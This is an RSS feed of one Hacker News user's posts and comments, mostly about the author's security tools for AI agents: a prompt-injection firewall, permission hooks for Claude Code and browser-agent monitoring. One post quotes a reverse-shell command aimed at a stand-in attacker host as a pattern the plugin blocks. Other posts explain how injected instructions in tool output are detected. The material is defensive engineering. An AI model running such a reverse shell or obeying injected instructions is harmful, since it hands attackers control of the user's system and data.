<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: ashwinr2002</title><link>https://news.ycombinator.com/user?id=ashwinr2002</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Sun, 12 Apr 2026 16:32:47 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=ashwinr2002" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by ashwinr2002 in "Claude Code Found a Linux Vulnerability Hidden for 23 Years"]]></title><description><![CDATA[
<p>Prompt Injections are very very rare these days after the Opus 4.6 update</p>
]]></description><pubDate>Sat, 04 Apr 2026 22:52:21 +0000</pubDate><link>https://news.ycombinator.com/item?id=47644366</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=47644366</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47644366</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Let's discuss sandbox isolation"]]></title><description><![CDATA[
<p>This is unreachable?</p>
]]></description><pubDate>Sat, 28 Feb 2026 22:01:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=47200758</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=47200758</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47200758</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "An AI agent published a hit piece on me"]]></title><description><![CDATA[
<p>minger's a new word</p>
]]></description><pubDate>Thu, 12 Feb 2026 22:47:28 +0000</pubDate><link>https://news.ycombinator.com/item?id=46996365</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46996365</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46996365</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Claude Code is being dumbed down?"]]></title><description><![CDATA[
<p>This is a horrible change!
I agree with everything in the article</p>
]]></description><pubDate>Thu, 12 Feb 2026 05:16:17 +0000</pubDate><link>https://news.ycombinator.com/item?id=46985139</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46985139</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46985139</guid></item><item><title><![CDATA[Show HN: Dangerously-skip-permissions IFF it doesn't WRITE outside Sandbox]]></title><description><![CDATA[
<p>Permission prompts are noisy if a command’s damage radius is limited to a sandbox.<p>I wanted to be asked for approval iff it’d make changes in external environments or talk to a network.<p>I built a Claude Code plugin that: (<a href="https://postimg.cc/crvWLNRR" rel="nofollow">https://postimg.cc/crvWLNRR</a>)<p>1) Always prompts for “write-external” commands <i>(db updates, API calls, remote writes), e.g. scp, curl -X POST, git push, sqlite3 etc. </i><p>2) Blocks known malware patterns like reverse shell patterns <i>(bash -i >& /dev/tcp/attacker.com/4444 0>&1) or writing to a Dotfile</i><p>It uses a PreTool hook to lookup the command before execution from a “write-external” registry. If its missing, a haiku model reads its man / --help pages and updates registry with usage patterns where external writes can happen.<p>To make manual changes to a registry, you can prompt Claude to “mark mytool as safe“ or “add curl to always ask“.</p>
<hr>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=46909878">https://news.ycombinator.com/item?id=46909878</a></p>
<p>Points: 1</p>
<p># Comments: 0</p>
]]></description><pubDate>Fri, 06 Feb 2026 06:48:22 +0000</pubDate><link>https://github.com/ContextFort-AI/Runtime-Controls</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46909878</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46909878</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Show HN: Prompt-injection firewall for OpenClaw agents"]]></title><description><![CDATA[
<p>Apologies for the formatting<p>Can we not assume that the plan you just said “ok” to came from a user prompts you made earlier in the chat session and hence does influence this decision process.<p>Another point in the idea is that this trusted context can include even the AI replies up until there hasnt been a tool calls yet that brings back a response an attacker can control<p>But it’s entirely possible that there are edge cases here, a red teaming dataset to cover these cases shouldn’t be hard to create</p>
]]></description><pubDate>Mon, 02 Feb 2026 16:26:16 +0000</pubDate><link>https://news.ycombinator.com/item?id=46857880</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46857880</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46857880</guid></item><item><title><![CDATA[Show HN: Prompt-injection firewall for OpenClaw agents]]></title><description><![CDATA[
<p>People seem to be blindly hooking up their OpenClaw’s to their personal data. So, I built runtime controls to prevent at the least, very simple prompt injection attacks.<p>Once installed, it hooks to Node.js child_process module in the gateway process and listens to tool calls and their response streams. And a fetch hook to monitor user prompts (<i>both could’ve been through fetch, happy to discuss why this whole layer couldn’t just be a proxy</i>).<p>There are two layers of protection:<p><i>First:</i> Whenever there is a read-only tool call whose response an attacker can modify, we extract that part of the json response and send it to a small haiku model to check if it has instruction asking the LLM to do something different<p><i>Second:</i> For when the prompt injection detection fails, we maintain a list of function calls which can write to places that an external actor can access. We prompt the user for explicit permission to go forward through the UI.<p>I would love a discussion on how this second layer could be made better and less frequent by relying on some decision process. My current idea:
Based on a collected set of “trusted” context (user prompts, responses from tool calls attackers cannot manipulate), can we detect if this tool call was necessary. There are scenarios where you’d need detection at the parameter-level.<p>Two notes:<p>1) This cannot just be a proxy because you need application level integration to have humans in the loop when needed and push UI controls.<p>2) How i improved accuracy of detecting prompt injection is by selecting only that content from the entire response json that can be manipulated by an external actor. This had to be done for each tool separately. The current implementation is for 2 skills I randomly chose (Notion & Github).<p>P.S.: I maintain one for claude code myself while working: <a href="https://github.com/ContextFort-AI/Runtime-Controls" rel="nofollow">https://github.com/ContextFort-AI/Runtime-Controls</a>, I created this over the weekend OpenClaw</p>
<hr>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=46854807">https://news.ycombinator.com/item?id=46854807</a></p>
<p>Points: 6</p>
<p># Comments: 3</p>
]]></description><pubDate>Mon, 02 Feb 2026 11:33:04 +0000</pubDate><link>https://github.com/ContextFort-AI/clawdbot-runtime-controls</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46854807</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46854807</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Using proxies to hide secrets from Claude Code"]]></title><description><![CDATA[
<p>I understand that, but how do you come up with the endpoints you want claude to have access to ahead of time?<p>For example, how do you collect all the endpoints that have access to customer info per your example.<p>Thought about it and couldn't find a way how</p>
]]></description><pubDate>Fri, 23 Jan 2026 03:21:14 +0000</pubDate><link>https://news.ycombinator.com/item?id=46727980</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46727980</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46727980</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Using proxies to hide secrets from Claude Code"]]></title><description><![CDATA[
<p>> With macaroons you can design the authz scheme that <i>you</i> want for any arbitrary API.<p>How would you build such an authz scheme?
When claude asks permissions to access a new endpoint, if the user allows it, then reissue the macaroons?</p>
]]></description><pubDate>Wed, 21 Jan 2026 00:58:47 +0000</pubDate><link>https://news.ycombinator.com/item?id=46699868</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46699868</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46699868</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Using proxies to hide secrets from Claude Code"]]></title><description><![CDATA[
<p>This seems like an under-rated comment.
You are right, this is a vulnerability and the blog doesn't talk about this.</p>
]]></description><pubDate>Wed, 21 Jan 2026 00:40:10 +0000</pubDate><link>https://news.ycombinator.com/item?id=46699738</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46699738</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46699738</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Show HN: ContextFort – Visibility and controls for browser agents"]]></title><description><![CDATA[
<p>P.S.: The extension has as many permissions as Claude in Chrome itself. But, the only network requests from the extension are to posthog, just for us to know which features are being used.<p>Here is a youtube video where I show the network requests of the extension: <a href="https://www.youtube.com/watch?v=J356Nquxmp4" rel="nofollow">https://www.youtube.com/watch?v=J356Nquxmp4</a><p>To know what posthog collects and how to disable it (change in a single line of code), please refer to this file: <a href="https://github.com/ContextFort-AI/ContextFort/blob/main/POSTHOG.md" rel="nofollow">https://github.com/ContextFort-AI/ContextFort/blob/main/POST...</a></p>
]]></description><pubDate>Wed, 14 Jan 2026 09:23:32 +0000</pubDate><link>https://news.ycombinator.com/item?id=46614026</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46614026</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46614026</guid></item><item><title><![CDATA[Show HN: ContextFort – Visibility and controls for browser agents]]></title><description><![CDATA[
<p>Hey HN! I’m Ashwin, co-founder of ContextFort (<a href="https://contextfort.ai/">https://contextfort.ai/</a>). We provide visibility and controls for AI browser agents like Claude in Chrome through an open-source browser extension.<p>Browser agents are AI copilots that can autonomously navigate and take actions in your browser. They show up as standalone browsers (Comet, Atlas) or Chrome extensions (Claude).<p>They’re especially useful in sites where search/API connectors don’t work well, like searching through Google Groups threads for a bug fix or pulling invoices from BILL.com. Anthropic released Claude CoWork yesterday, and in their launch video, they showcased their browser-use chromium extension: <a href="https://www.youtube.com/watch?v=UAmKyyZ-b9E" rel="nofollow">https://www.youtube.com/watch?v=UAmKyyZ-b9E</a><p>But enterprise adoption is slow because of indirect prompt injection risks, about which Simon Willison has written in great detail in his blogs: <a href="https://simonwillison.net/2025/Aug/26/piloting-claude-for-chrome/" rel="nofollow">https://simonwillison.net/2025/Aug/26/piloting-claude-for-ch...</a>. And before security teams can decide on guardrails, they need to know how employees are using browser agents to understand where the risks are.<p>So, we reverse-engineered how the Claude in Chrome extension works and built a visibility layer that tracks agent sessions end-to-end. It detects when an AI agent takes control of the browser and records which pages it visited during a session and what it does on each page (what was clicked and where text was input).<p>On top of that, we’ve also added simple controls for security teams to act on based on what the visibility layer captures:<p>(1) Block specific actions on specific pages (e.g., prevent the agent from clicking “Submit” on email)<p>(2) Block risky cross-site flows in a single session (e.g., block navigation to Atlassian after interacting with StackOverflow), or apply a stricter policy and block bringing any external context to Atlassian entirely.<p>We demo all the above features here in this 2-minute YouTube video:  <a href="https://www.youtube.com/watch?v=1YtEGVZKMeo" rel="nofollow">https://www.youtube.com/watch?v=1YtEGVZKMeo</a><p>You can try our browser extension here: <a href="https://github.com/ContextFort-AI/ContextFort" rel="nofollow">https://github.com/ContextFort-AI/ContextFort</a><p>Thrilled to share this with you and hear your comments!</p>
<hr>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=46614015">https://news.ycombinator.com/item?id=46614015</a></p>
<p>Points: 14</p>
<p># Comments: 1</p>
]]></description><pubDate>Wed, 14 Jan 2026 09:22:42 +0000</pubDate><link>https://contextfort.ai/</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=46614015</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46614015</guid></item><item><title><![CDATA[New comment by ashwinr2002 in "Show HN: April (YC S25) – Hit Inbox Zero with Just Your Voice While You Drive"]]></title><description><![CDATA[
<p>Really cool product!
Which email providers do you support?</p>
]]></description><pubDate>Fri, 15 Aug 2025 22:14:53 +0000</pubDate><link>https://news.ycombinator.com/item?id=44917889</link><dc:creator>ashwinr2002</dc:creator><comments>https://news.ycombinator.com/item?id=44917889</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=44917889</guid></item></channel></rss>